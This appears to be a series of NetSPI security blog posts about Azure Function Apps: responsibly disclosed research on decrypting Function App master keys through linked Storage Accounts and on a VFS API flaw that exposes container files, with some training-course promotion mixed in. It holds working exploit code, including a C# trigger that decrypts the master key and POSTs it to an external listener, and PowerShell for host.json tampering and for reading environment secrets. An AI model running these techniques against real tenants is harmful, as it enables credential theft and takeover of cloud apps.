Thank you, we absolutely appreciate your flagging this issue to us, and we look forward to more submissions from you in the future!
- 8/03/23 – NetSPI replies, restating the issue and attempting to clarify MSRC’s understanding of the issue
- 8/04/23 – MSRC Reopens the case, partly thanks to a thread of tweets
- 9/11/23 - Follow up email with MSRC confirms the fix is in progress
- 11/16/23 – NetSPI discloses the issue publicly
Microsoft’s solution for this issue was to encrypt the “MSISpecializationPayload” and rename it to “EncryptedTokenServiceSpecializationPayload”. It's unclear how this is getting encrypted, but we were able to confirm that the key that encrypts the credentials does not exist in the container that runs the user code.
It should be noted that the decryption technique for the “CONTAINER_START_CONTEXT_SAS_URI” still works to expose the Function App keys. So, if you do manage to get code execution in a Function App container, you can still potentially use this technique to persist on the Function App with this method.
Prior Research Note:
While doing our due diligence for this blog, we tried to find any prior research on this topic. It appears that Trend Micro also found this issue and disclosed it in June of 2022.
Azure Cloud Security Pentesting Skills

At Black Hat, NetSPI VP of Research Karl Fosaaen sat down with the host of the Cloud Security Podcast Ashish Rajan to discuss all things Azure penetration testing.
During the conversation, he addressed the unique challenges associated with conducting penetration tests on web applications hosted within the Azure Cloud and provided valuable insights into the specialized skills required for effective penetration testing in Azure environments.
Contrary to common misconceptions, cloud penetration testing in Microsoft Azure is far more complex than a mere configuration review, a misconception that extends to other cloud providers like AWS and Google Cloud as well. In this video, Karl addresses several important questions and methodologies, clarifying the distinct nature of penetration testing within the Azure ecosystem.
The full conversation is available here: https://youtu.be/Y0BkXKthQ5c
NetSPI's Dark Side Ops Courses: Evolving Cybersecurity Excellence

Today, we are excited to introduce you to the transformed Dark Side Ops (DSO) training courses by NetSPI. With years of experience under our belt, we've taken our renowned DSO courses and reimagined them to offer a dynamic, self-directed approach.
The Evolution of DSO
Traditionally, our DSO courses were conducted in-person, offering a blend of expert-led lectures and hands-on labs. However, the pandemic prompted us to adapt. We shifted to remote learning via Zoom, but we soon realized that we were missing the interactivity and personalized pace that made in-person training so impactful.
A Fresh Approach
In response to this, we've reimagined DSO for the modern era. Presenting our self-directed, student-paced online courses that give you the reins to your learning journey. While preserving the exceptional content, we've infused a new approach that includes:
- Video Lectures: Engaging video presentations that bring the classroom to your screen, allowing you to learn at your convenience.
- Real-World Labs: Our DSO courses now enable you to create your own hands-on lab environment, bridging the gap between theory and practice.
- Extended Access: Say goodbye to rushed deadlines. You now have a 90-day window to complete the course at your own pace, ensuring a comfortable and comprehensive learning experience.
- Quality, Reimagined: We are unwavering in our commitment to upholding the highest training standards. Your DSO experience will continue to be exceptional.
- Save Big: For those eager to maximize their learning journey, register for all three courses and save $1,500.
What is DSO?
DSO 1: Malware Dev Training
- Dive deep into source code to gain a strong understanding of execution vectors, payload generation, automation, staging, command and control, and exfiltration. Intensive, hands-on labs provide even intermediate participants with a structured and challenging approach to write custom code and bypass the very latest in offensive countermeasures.
DSO 2: Adversary Simulation Training
- Do you want to be the best resource when the red team is out of options? Can you understand, research, build, and integrate advanced new techniques into existing toolkits? Challenge yourself to move beyond blog posts, how-tos, and simple payloads. Let’s start simulating real world threats with real world methodology.
DSO Azure: Azure Cloud Pentesting Training
- Traditional penetration testing has focused on physical assets on internal and external networks. As more organizations begin to shift these assets up to cloud environments, penetration testing processes need to be updated to account for the complexities introduced by cloud infrastructure.
Join us on this journey of continuous learning, where we're committed to supporting you every step of the way.
Join our mailing list for more updates and remember, in the realm of cybersecurity, constant evolution is key. We are here to help you stay ahead in this ever-evolving landscape.
When deploying an Azure Function App, you're typically prompted to select a Storage Account to use in support of the application. Access to these supporting Storage Accounts can lead to disclosure of Function App source code, command execution in the Function App, and (as we'll show in this blog) decryption of the Function App Access Keys.
Azure Function Apps use Access Keys to secure access to HTTP Trigger functions. There are three types of access keys that can be used: function, system, and master (HTTP function endpoints can also be accessed anonymously). The most privileged access key available is the master key, which grants administrative access to the Function App including being able to read and write function source code.
The master key should be protected and should not be used for regular activities. Gaining access to the master key could lead to supply chain attacks and control of any managed identities assigned to the Function. This blog explores how an attacker can decrypt these access keys if they gain access via the Function App’s corresponding Storage Account.
TL;DR
- Function App Access Keys can be stored in Storage Account containers in an encrypted format
- Access Keys can be decrypted within the Function App container AND offline
- Works with Windows or Linux, with any runtime stack
- Decryption requires access to the decryption key (stored in an environment variable in the Function container) and the encrypted key material (from host.json).
Previous Research
- Rogier Dijkman – Privilege Escalation via storage accounts
- Roi Nisimi – From listKeys to Glory: How We Achieved a Subscription Privilege Escalation and RCE by Abusing Azure Storage Account Keys
- Bill Ben Haim & Zur Ulianitzky – 10 ways of gaining control over Azure function Apps
- Andy Robbins – Abusing Azure App Service Managed Identity Assignments
- MSRC – Best practices regarding Azure Storage Keys, Azure Functions, and Azure Role Based Access
Requirements
Function Apps depend on Storage Accounts at multiple product tiers for code and secret storage. Extensive research has already been done for attacking Functions directly and via the corresponding Storage Accounts for Functions. This blog will focus specifically on key decryption for Function takeover.
Required Permissions
- Permission to read Storage Account Container blobs, specifically the host.json file (located in Storage Account Containers named “azure-webjobs-secrets”)
- Permission to write to Azure File Shares hosting Function code
The host.json file contains the encrypted access keys. The encrypted master key is contained in the masterKey.value field.
{
"masterKey": {
"name": "master",
"value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]IA",
"encrypted": true
},
"functionKeys": [
{
"name": "default",
"value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]8Q",
"encrypted": true
}
],
"systemKeys": [],
"hostName": "thisisafakefunctionappprobably.azurewebsites.net",
"instanceId": "dc[TRUNCATED]c3",
"source": "runtime",
"decryptionKeyId": "MACHINEKEY_DecryptionKey=op+[TRUNCATED]Z0=;"
}
The code for the corresponding Function App is stored in Azure File Shares. For what it's worth, with access to the host.json file, an attacker can technically overwrite existing keys and set the "encrypted" parameter to false, to inject their own cleartext function keys into the Function App (see Rogier Dijkman's research; a rough sketch of this path follows below). A Windows ASP.NET Function App (thisisnotrealprobably) typically places each function in its own folder under the wwwroot directory of the hosting File Share.
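A minimal sketch of that tampering path, assuming Storage Account access; the account, key, and blob path placeholders are hypothetical, and blob paths under azure-webjobs-secrets vary by app name:

# Sketch: pull host.json, swap in a cleartext master key, and push it back
$sctx = New-AzStorageContext -StorageAccountName "<account>" -StorageAccountKey "<key>"
Get-AzStorageBlobContent -Container "azure-webjobs-secrets" -Blob "<functionappname>/host.json" -Destination .\host.json -Context $sctx | Out-Null
$hostJson = Get-Content .\host.json -Raw | ConvertFrom-Json
$hostJson.masterKey.value = "AttackerControlledKeyValue"   # hypothetical cleartext key
$hostJson.masterKey.encrypted = $false
$hostJson | ConvertTo-Json -Depth 10 | Set-Content .\host.json
Set-AzStorageBlobContent -Container "azure-webjobs-secrets" -File .\host.json -Blob "<functionappname>/host.json" -Context $sctx -Force | Out-Null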
A new function can be created by adding a new set of folders under the wwwroot folder in the SMB file share.
The ability to create a new function trigger by creating folders in the File Share is necessary to either decrypt the key in the function runtime OR return the decryption key by retrieving a specific environment variable.
Decryption in the Function container
Function App Key Decryption is dependent on ASP.NET Core Data Protection. There are multiple references to a specific library for Function Key security in the Function Host code.
An old version of this library can be found at https://github.com/Azure/azure-websites-security. This library creates a Function specific Azure Data Protector for decryption. The code below has been modified from an old MSDN post to integrate the library directly into a .NET HTTP trigger. Providing the encrypted master key to the function decrypts the key upon triggering.
The sample code below can be modified to decrypt the key and then send the key to a publicly available listener.
#r "Newtonsoft.Json"
using Microsoft.AspNetCore.DataProtection;
using Microsoft.Azure.Web.DataProtection;
using System.Net.Http;
using System.Text;
using System.Net;
using Microsoft.AspNetCore.Mvc;
using Microsoft.Extensions.Primitives;
using Newtonsoft.Json;
private static HttpClient httpClient = new HttpClient();
public static async Task<IActionResult> Run(HttpRequest req, ILogger log)
{
log.LogInformation("C# HTTP trigger function processed a request.");
DataProtectionKeyValueConverter converter = new DataProtectionKeyValueConverter();
string keyname = "master";
string encval = "Cf[TRUNCATED]NQ";
var ikey = new Key(keyname, encval, true);
if (ikey.IsEncrypted)
{
ikey = converter.ReadValue(ikey);
}
// log.LogInformation(ikey.Value);
string url = "https://[TRUNCATED]";
string body = $"{{\"name\":\"{keyname}\", \"value\":\"{ikey.Value}\"}}";
var response = await httpClient.PostAsync(url, new StringContent(body.ToString()));
string name = req.Query["name"];
string requestBody = await new StreamReader(req.Body).ReadToEndAsync();
dynamic data = JsonConvert.DeserializeObject(requestBody);
name = name ?? data?.name;
string responseMessage = string.IsNullOrEmpty(name)
? "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response."
: $"Hello, {name}. This HTTP triggered function executed successfully.";
return new OkObjectResult(responseMessage);
}
class DataProtectionKeyValueConverter
{
private readonly IDataProtector _dataProtector;
public DataProtectionKeyValueConverter()
{
var provider = DataProtectionProvider.CreateAzureDataProtector();
_dataProtector = provider.CreateProtector("function-secrets");
}
public Key ReadValue(Key key)
{
var resultKey = new Key(key.Name, null, false);
resultKey.Value = _dataProtector.Unprotect(key.Value);
return resultKey;
}
}
class Key
{
public Key(){}
public Key(string name, string value, bool encrypted)
{
Name = name;
Value = value;
IsEncrypted = encrypted;
}
[JsonProperty(PropertyName = "name")]
public string Name { get; set; }
[JsonProperty(PropertyName = "value")]
public string Value { get; set; }
[JsonProperty(PropertyName = "encrypted")]
public bool IsEncrypted { get; set; }
}
Triggering the function via a browser kicks off the request, and the Burp Collaborator listener catches the outbound POST containing the decrypted master key.
Local Decryption
Decryption can also be done outside of the function container. The https://github.com/Azure/azure-websites-security repo contains an older version of the code that can be pulled down and run locally through Visual Studio. However, there is one requirement for running locally and that is access to the decryption key.
The code makes multiple references to the location of default keys. The Constants.cs file points to two environment variables of note: AzureWebEncryptionKey (the default) and MACHINEKEY_DecryptionKey. The decryption code defaults to the AzureWebEncryptionKey environment variable.
One thing to keep in mind is that the environment variable will be different depending on the underlying Function operating system. Linux based containers will use AzureWebEncryptionKey while Windows will use MACHINEKEY_DecryptionKey. One of those environment variables will be available via Function App Trigger Code, regardless of the runtime used. The environment variable values can be returned in the Function by using native code. Example below is for PowerShell in a Windows environment:
$env:MACHINEKEY_DecryptionKey
This can then be returned to the user via an HTTP Trigger response or by having the Function send the value to another endpoint.
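As a rough sketch, a PowerShell HTTP trigger built on the standard Azure Functions template could return whichever variable is present (both variable names come from Constants.cs):

using namespace System.Net
param($Request, $TriggerMetadata)

# Return whichever decryption key variable exists on this container OS
$key = $env:MACHINEKEY_DecryptionKey                   # Windows
if (-not $key) { $key = $env:AzureWebEncryptionKey }   # Linux

Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{
    StatusCode = [HttpStatusCode]::OK
    Body       = $key
})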
Local decryption can be done once the encrypted key data and the decryption key are obtained. After pulling down the GitHub repo and getting it set up in Visual Studio, quick decryption can be done directly through an existing test case in DataProtectionProviderTests.cs, with the following edits.
// Copyright (c) .NET Foundation. All rights reserved.
// Licensed under the MIT License. See License.txt in the project root for license information.
using System;
using Microsoft.Azure.Web.DataProtection;
using Microsoft.AspNetCore.DataProtection;
using Xunit;
using System.Diagnostics;
using System.IO;
namespace Microsoft.Azure.Web.DataProtection.Tests
{
public class DataProtectionProviderTests
{
[Fact]
public void EncryptedValue_CanBeDecrypted()
{
using (var variables = new TestScopedEnvironmentVariable(Constants.AzureWebsiteLocalEncryptionKey, "CE[TRUNCATED]1B"))
{
var provider = DataProtectionProvider.CreateAzureDataProtector(null, true);
var protector = provider.CreateProtector("function-secrets");
string expected = "test string";
// string encrypted = protector.Protect(expected);
string encrypted = "Cf[TRUNCATED]8w";
string result = protector.Unprotect(encrypted);
File.WriteAllText("test.txt", result);
Assert.Equal(expected, result);
}
}
}
}
Replace the two required values (the decryption key and the encrypted master key), then run the test case. The assertion will fail, but the decrypted master key will be written to test.txt! This can then be used to query the Function App administrative REST APIs.
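With the master key in hand, querying the administrative APIs is a single authenticated request. A minimal sketch, with a placeholder host name (the /admin/functions endpoint lists the deployed functions):

$masterKey = Get-Content .\test.txt
Invoke-RestMethod -Uri "https://FUNCTION_APP_NAME.azurewebsites.net/admin/functions" -Headers @{ "x-functions-key" = $masterKey }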
Tool Overview
NetSPI created a proof-of-concept tool to exploit Function Apps through the connected Storage Account. The tool requires write access to the corresponding File Share where the Function code is stored and supports .NET, PSCore, Python, and Node. Given a Storage Account that is connected to a Function App, the tool will attempt to create an HTTP Trigger (function-specific API key required for access) to return the decryption key and scoped Managed Identity access tokens (if applicable). The tool will also attempt to clean up any uploaded code once the key and tokens are received.
Once the encryption key and encrypted function app key are returned, you can use the Function App code included in the repo to decrypt the master key. To make it easier, we’ve provided an ARM template in the repo that will create the decryption Function App for you.
See the GitHub link https://github.com/NetSPI/FuncoPop for more info.
Prevention and Mitigation
There are a number of ways to prevent the attack scenarios outlined in this blog and in previous research. The best prevention strategy is treating the corresponding Storage Accounts as an extension of the Function Apps. This includes:
- Limiting the use of Storage Account Shared Access Keys and ensuring that they are not stored in cleartext.
- Rotating Shared Access Keys regularly (a rotation sketch follows this list).
- Limiting the creation of privileged, long-lasting SAS tokens.
- Use the principle of least privilege. Only grant the privileges necessary, at the narrowest scope possible. Be aware of any roles that grant write access to Storage Accounts (including those roles with list keys permissions!).
- Identify Function Apps that use Storage Accounts and ensure that these resources are placed in dedicated Resource Groups.
- Avoid using shared Storage Accounts for multiple Functions.
- Ensure that Diagnostic Settings are in place to collect audit and data plane logs.
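For the key rotation item above, a minimal Az PowerShell sketch (the resource group and account names are placeholders):

# Regenerate key1 for a Storage Account; anything using the old key1 will lose access
New-AzStorageAccountKey -ResourceGroupName "RESOURCE_GROUP" -Name "STORAGE_ACCOUNT" -KeyName "key1"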
More direct methods of mitigation can also be taken such as storing keys in Key Vaults or restricting Storage Accounts to VNETs. See the links below for Microsoft recommendations.
- https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations?tabs=azure-cli#important-considerations
- https://learn.microsoft.com/en-us/azure/azure-functions/functions-networking-options?tabs=azure-cli#restrict-your-storage-account-to-a-virtual-network
- https://learn.microsoft.com/en-us/azure/azure-functions/functions-networking-options?tabs=azure-cli#use-key-vault-references
- https://learn.microsoft.com/en-us/azure/azure-functions/security-concepts?tabs=v4
MSRC Timeline
As part of our standard Azure research process, we ran our findings by MSRC before publishing anything.
02/08/2023 - Initial report created
02/13/2023 - Case closed as expected and documented behavior
03/08/2023 - Second report created
04/25/2023 - MSRC confirms original assessment as expected and documented behavior
08/12/2023 - DefCon Cloud Village presentation
Thanks to Nick Landers for his help/research into ASP.NET Core Data Protection.
Escalating Privileges with Azure Function Apps

As penetration testers, we continue to see an increase in applications built natively in the cloud. These are a mix of legacy applications that are ported to cloud-native technologies and new applications that are freshly built in the cloud provider. One of the technologies that we see being used to support these development efforts is Azure Function Apps. We recently took a deeper look at some of the Function App functionality that resulted in a privilege escalation scenario for users with Reader role permissions on Function Apps. In the case of functions running in Linux containers, this resulted in command execution in the application containers.
TL;DR
Undocumented APIs used by the Azure Function Apps Portal menu allowed for arbitrary file reads on the Function App containers.
- For the Windows containers, this resulted in access to ASP.NET encryption keys.
- For the Linux containers, this resulted in access to function master keys that allowed for overwriting Function App code and gaining remote code execution in the container.
What are Azure Function Apps?
As noted above, Function Apps are one of the pieces of technology used for building cloud-native applications in Azure. The service falls under the umbrella of “App Services” and has many of the common features of the parent service. At its core, the Function App service is a lightweight API service that can be used for hosting serverless application services.
The Azure Portal allows users (with Reader or greater permissions) to view files associated with the Function App, along with the code for the application endpoints (functions). In the Azure Portal, under App files, we can see the files available at the root of the Function App. These are usually requirement files and any supporting files you want to have available for all underlying functions.
Under the individual functions (HttpTrigger1), we can enter the Code + Test menu to see the source code for the function. Much like the code in an Automation Account Runbook, the function code is available to anyone with Reader permissions. We do frequently find hardcoded credentials in this menu, so this is a common menu for us to work with.
Both file viewing options rely on an undocumented API that can be found by proxying your browser traffic while accessing the Azure Portal. The following management.azure.com API endpoint uses the VFS function to list files in the Function App:
https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?relativePath=1&api-version=2021-01-15
In the example above, $SUB_ID would be your subscription ID, and this is for the “vfspoc” Function App in the “tester” resource group.
Discovery of the Issue
Using the identified URL, we started enumerating available files in the output:
[ { "name": "host.json", "size": 141, "mtime": "2022-08-02T19:49:04.6152186+00:00", "crtime": "2022-08-02T19:49:04.6092235+00:00", "mime": "application/json", "href": "https://vfspoc.azurewebsites.net/admin/vfs/host. json?relativePath=1&api-version=2021-01-15", "path": "C:\\home\\site\\wwwroot\\host.json" }, { "name": "HttpTrigger1", "size": 0, "mtime": "2022-08-02T19:51:52.0190425+00:00", "crtime": "2022-08-02T19:51:52.0190425+00:00", "mime": "inode/directory", "href": "https://vfspoc.azurewebsites.net/admin/vfs/Http Trigger1%2F?relativePath=1&api-version=2021-01-15", "path": "C:\\home\\site\\wwwroot\\HttpTrigger1" } ]
As we can see above, this is the expected output. We can see the host.json file that is available in the Azure Portal, and the HttpTrigger1 function directory. At first glance, this may seem like nothing. While reviewing some function source code in client environments, we noticed that additional directories were being added to the Function App root directory to add libraries and supporting files for use in the functions. These files are not visible in the Portal if they’re in a directory (See “Secret Directory” below). The Portal menu doesn’t have folder handling built in, so these files seem to be invisible to anyone with the Reader role.
By using the VFS APIs, we can view all the files in these application directories, including sensitive files that the Azure Function App Contributors might have assumed were hidden from Readers. While this is a minor information disclosure, we can take the issue further by modifying the “relativePath” parameter in the URL from a “1” to a “0”.
Changing this parameter allows us to now see the direct file system of the container. In this first case, we’re looking at a Windows Function App container. As a test harness, we’ll use a little PowerShell to grab a “management.azure.com” token from our authenticated (as a Reader) Azure PowerShell module session, and feed that to the API for our requests to read the files from the vfspoc Function App.
$mgmtToken = (Get-AzAccessToken -ResourceUrl "https://management.azure.com").Token
(Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?relativePath=0&api-version=2021-01-15")) -Headers @{Authorization="Bearer $mgmtToken"}).Content | ConvertFrom-Json

name   : data
size   : 0
mtime  : 2022-09-12T20:20:48.2362984+00:00
crtime : 2022-09-12T20:20:48.2362984+00:00
mime   : inode/directory
href   : https://vfspoc.azurewebsites.net/admin/vfs/data%2F?relativePath=0&api-version=2021-01-15
path   : D:\home\data

name   : LogFiles
size   : 0
mtime  : 2022-09-12T20:20:02.5561162+00:00
crtime : 2022-09-12T20:20:02.5561162+00:00
mime   : inode/directory
href   : https://vfspoc.azurewebsites.net/admin/vfs/LogFiles%2F?relativePath=0&api-version=2021-01-15
path   : D:\home\LogFiles

name   : site
size   : 0
mtime  : 2022-09-12T20:20:02.5701081+00:00
crtime : 2022-09-12T20:20:02.5701081+00:00
mime   : inode/directory
href   : https://vfspoc.azurewebsites.net/admin/vfs/site%2F?relativePath=0&api-version=2021-01-15
path   : D:\home\site

name   : ASP.NET
size   : 0
mtime  : 2022-09-12T20:20:48.2362984+00:00
crtime : 2022-09-12T20:20:48.2362984+00:00
mime   : inode/directory
href   : https://vfspoc.azurewebsites.net/admin/vfs/ASP.NET%2F?relativePath=0&api-version=2021-01-15
path   : D:\home\ASP.NET
Access to Encryption Keys on the Windows Container
With access to the container’s underlying file system, we’re now able to browse into the ASP.NET directory on the container. This directory contains the “DataProtection-Keys” subdirectory, which houses xml files with the encryption keys for the application.
Here’s an example URL and file for those keys:
https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//ASP.NET/DataProtection-Keys/key-ad12345a-e321-4a1a-d435-4a98ef4b3fb5.xml?relativePath=0&api-version=2018-11-01

<?xml version="1.0" encoding="utf-8"?>
<key id="ad12345a-e321-4a1a-d435-4a98ef4b3fb5" version="1">
  <creationDate>2022-03-29T11:23:34.5455524Z</creationDate>
  <activationDate>2022-03-29T11:23:34.2303392Z</activationDate>
  <expirationDate>2022-06-27T11:23:34.2303392Z</expirationDate>
  <descriptor deserializerType="Microsoft.AspNetCore.DataProtection.AuthenticatedEncryption.ConfigurationModel.AuthenticatedEncryptorDescriptorDeserializer, Microsoft.AspNetCore.DataProtection, Version=3.1.18.0, Culture=neutral, PublicKeyToken=ace99892819abce50">
    <descriptor>
      <encryption algorithm="AES_256_CBC" />
      <validation algorithm="HMACSHA256" />
      <masterKey p4:requiresEncryption="true" xmlns:p4="https://schemas.asp.net/2015/03/dataProtection">
        <!-- Warning: the key below is in an unencrypted form. -->
        <value>a5[REDACTED]==</value>
      </masterKey>
    </descriptor>
  </descriptor>
</key>
While we couldn’t use these keys during the initial discovery of this issue, there is potential for these keys to be abused for decrypting information from the Function App. Additionally, we have more pressing issues to look at in the Linux container.
Command Execution on the Linux Container
Since Function Apps can run in both Windows and Linux containers, we decided to spend a little time on the Linux side with these APIs. Using the same API URLs as before, we change them over to a Linux container function app (vfspoc2). As we see below, this same API (with “relativePath=0”) now exposes the Linux base operating system files for the container:
https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//?relativePath=0&api-version=2021-01-15
JSON output parsed into a PowerShell object:
name : lost+found
size : 0
mtime : 1970-01-01T00:00:00+00:00
crtime : 1970-01-01T00:00:00+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/lost%2Bfound%2F?relativePath=0&api-version=2021-01-15
path : /lost+found
[Truncated]
name : proc
size : 0
mtime : 2022-09-14T22:28:57.5032138+00:00
crtime : 2022-09-14T22:28:57.5032138+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/proc%2F?relativePath=0&api-version=2021-01-15
path : /proc
[Truncated]
name : tmp
size : 0
mtime : 2022-09-14T22:56:33.6638983+00:00
crtime : 2022-09-14T22:56:33.6638983+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/tmp%2F?relativePath=0&api-version=2021-01-15
path : /tmp
name : usr
size : 0
mtime : 2022-09-02T21:47:36+00:00
crtime : 1970-01-01T00:00:00+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/usr%2F?relativePath=0&api-version=2021-01-15
path : /usr
name : var
size : 0
mtime : 2022-09-03T21:23:43+00:00
crtime : 2022-09-03T21:23:43+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/var%2F?relativePath=0&api-version=2021-01-15
path : /var
Breaking out one of my favorite NetSPI blogs, Directory Traversal, File Inclusion, and The Proc File System, we know that we can potentially access environment variables for the different PIDs listed in the "proc" directory.
If we request a listing of the proc directory, we can see that there are a handful of PIDs (denoted by the numbers) listed:
https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/?relativePath=0&api-version=2021-01-15
JSON output parsed into a PowerShell object:
name : fs
size : 0
mtime : 2022-09-21T22:00:39.3885209+00:00
crtime : 2022-09-21T22:00:39.3885209+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/proc/fs/?relativePath=0&api-version=2021-01-15
path : /proc/fs
name : bus
size : 0
mtime : 2022-09-21T22:00:39.3895209+00:00
crtime : 2022-09-21T22:00:39.3895209+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/proc/bus/?relativePath=0&api-version=2021-01-15
path : /proc/bus
[Truncated]
name : 1
size : 0
mtime : 2022-09-21T22:00:38.2025209+00:00
crtime : 2022-09-21T22:00:38.2025209+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1/?relativePath=0&api-version=2021-01-15
path : /proc/1
name : 16
size : 0
mtime : 2022-09-21T22:00:38.2025209+00:00
crtime : 2022-09-21T22:00:38.2025209+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/proc/16/?relativePath=0&api-version=2021-01-15
path : /proc/16
[Truncated]
name : 59
size : 0
mtime : 2022-09-21T22:00:38.6785209+00:00
crtime : 2022-09-21T22:00:38.6785209+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/proc/59/?relativePath=0&api-version=2021-01-15
path : /proc/59
name : 1113
size : 0
mtime : 2022-09-21T22:16:09.1248576+00:00
crtime : 2022-09-21T22:16:09.1248576+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1113/?relativePath=0&api-version=2021-01-15
path : /proc/1113
name : 1188
size : 0
mtime : 2022-09-21T22:17:18.5695703+00:00
crtime : 2022-09-21T22:17:18.5695703+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1188/?relativePath=0&api-version=2021-01-15
path : /proc/1188
For the next step, we can use PowerShell to request the "environ" file from PID 59 to get the environment variables for that PID. We will then write it to a temp file and "get-content" the file to output it.
$mgmtToken = (Get-AzAccessToken -ResourceUrl "https://management.azure.com").Token
Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/59/environ?relativePath=0&api-version=2021-01-15")) -Headers @{Authorization="Bearer $mgmtToken"} -OutFile .\TempFile.txt
gc .\TempFile.txt
PowerShell Output - Newlines added for clarity:
CONTAINER_IMAGE_URL=mcr.microsoft.com/azure-functions/mesh:3.13.1-python3.7
REGION_NAME=Central US
HOSTNAME=SandboxHost-637993944271867487
[Truncated]
CONTAINER_ENCRYPTION_KEY=bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=
LANG=C.UTF-8
CONTAINER_NAME=E9911CE2-637993944227393451
[Truncated]
CONTAINER_START_CONTEXT_SAS_URI=https://wawsstorageproddm1157.blob.core.windows.net/azcontainers/e9911ce2-637993944227393451?sv=2014-02-14&sr=b&sig=5ce7MUXsF4h%2Fr1%2BfwIbEJn6RMf2%2B06c2AwrNSrnmUCU%3D&st=2022-09-21T21%3A55%3A22Z&se=2023-09-21T22%3A00%3A22Z&sp=r
[Truncated]
In the output, we can see that there are a couple of interesting variables.
- CONTAINER_ENCRYPTION_KEY
- CONTAINER_START_CONTEXT_SAS_URI
The encryption key variable is self-explanatory, and the SAS URI should be familiar to anyone that read Jake Karnes’ post on attacking Azure SAS tokens. If we navigate to the SAS token URL, we’re greeted with an “encryptedContext” JSON blob. Conveniently, we have the encryption key used for this data.
Using CyberChef, we can quickly pull together the pieces to decrypt the data. In this case, the IV is the first portion of the JSON blob (“Bad/iquhIPbJJc4n8wcvMg==”). We know the key (“bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=”), so we will just use the middle portion of the Base64 JSON blob as our input.
Here’s what the recipe looks like in CyberChef:
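For anyone who would rather script it than use CyberChef, here is a rough PowerShell equivalent. It assumes $blob holds the middle Base64 portion of the encryptedContext value, and uses the IV and key called out above:

# AES-256-CBC decryption of the SAS blob contents (PKCS7 padding is the .NET default)
$key        = [Convert]::FromBase64String("bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=")
$iv         = [Convert]::FromBase64String("Bad/iquhIPbJJc4n8wcvMg==")
$ciphertext = [Convert]::FromBase64String($blob)   # middle Base64 segment of the blob

$aes      = [System.Security.Cryptography.Aes]::Create()
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aes.Key  = $key
$aes.IV   = $iv
$plain = $aes.CreateDecryptor().TransformFinalBlock($ciphertext, 0, $ciphertext.Length)
[System.Text.Encoding]::UTF8.GetString($plain)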
Once decrypted, we have another JSON blob of data, now with only one encrypted chunk (“EncryptedEnvironment”). We won’t be dealing with that data as the important information has already been decrypted below.
{"SiteId":98173790,"SiteName":"vfspoc2", "EncryptedEnvironment":"2 | Xj[REDACTED]== | XjAN7[REDACTED]KRz", "Environment":{"FUNCTIONS_EXTENSION_VERSION":"~3", "APPSETTING_FUNCTIONS_EXTENSION_VERSION":"~3", "FUNCTIONS_WORKER_RUNTIME":"python", "APPSETTING_FUNCTIONS_WORKER_RUNTIME":"python", "AzureWebJobsStorage":"DefaultEndpointsProtocol=https;AccountName= storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;EndpointSuffix= core.windows.net", "APPSETTING_AzureWebJobsStorage":"DefaultEndpointsProtocol=https; AccountName=storageaccountfunct9626;AccountKey=7s[REDACTED]uA==; EndpointSuffix=core.windows.net", "ScmType":"None", "APPSETTING_ScmType":"None", "WEBSITE_SITE_NAME":"vfspoc2", "APPSETTING_WEBSITE_SITE_NAME":"vfspoc2", "WEBSITE_SLOT_NAME":"Production", "APPSETTING_WEBSITE_SLOT_NAME":"Production", "SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.blob.core. windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-02-14&sr=b& sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", "APPSETTING_SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626. blob.core.windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014- 02-14&sr=b&sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", "WEBSITE_AUTH_ENCRYPTION_KEY":"F1[REDACTED]25", "AzureWebEncryptionKey":"F1[REDACTED]25", "WEBSITE_AUTH_SIGNING_KEY":"AF[REDACTED]DA", [Truncated] "FunctionAppScaleLimit":0,"CorsSpecializationPayload":{"Allowed Origins":["https://functions.azure.com", "https://functions-staging.azure.com", "https://functions-next.azure.com"],"SupportCredentials":false}, "EasyAuthSpecializationPayload":{"SiteAuthEnabled":true,"SiteAuth ClientId":"18[REDACTED]43", "SiteAuthAutoProvisioned":true,"SiteAuthSettingsV2Json":null}, 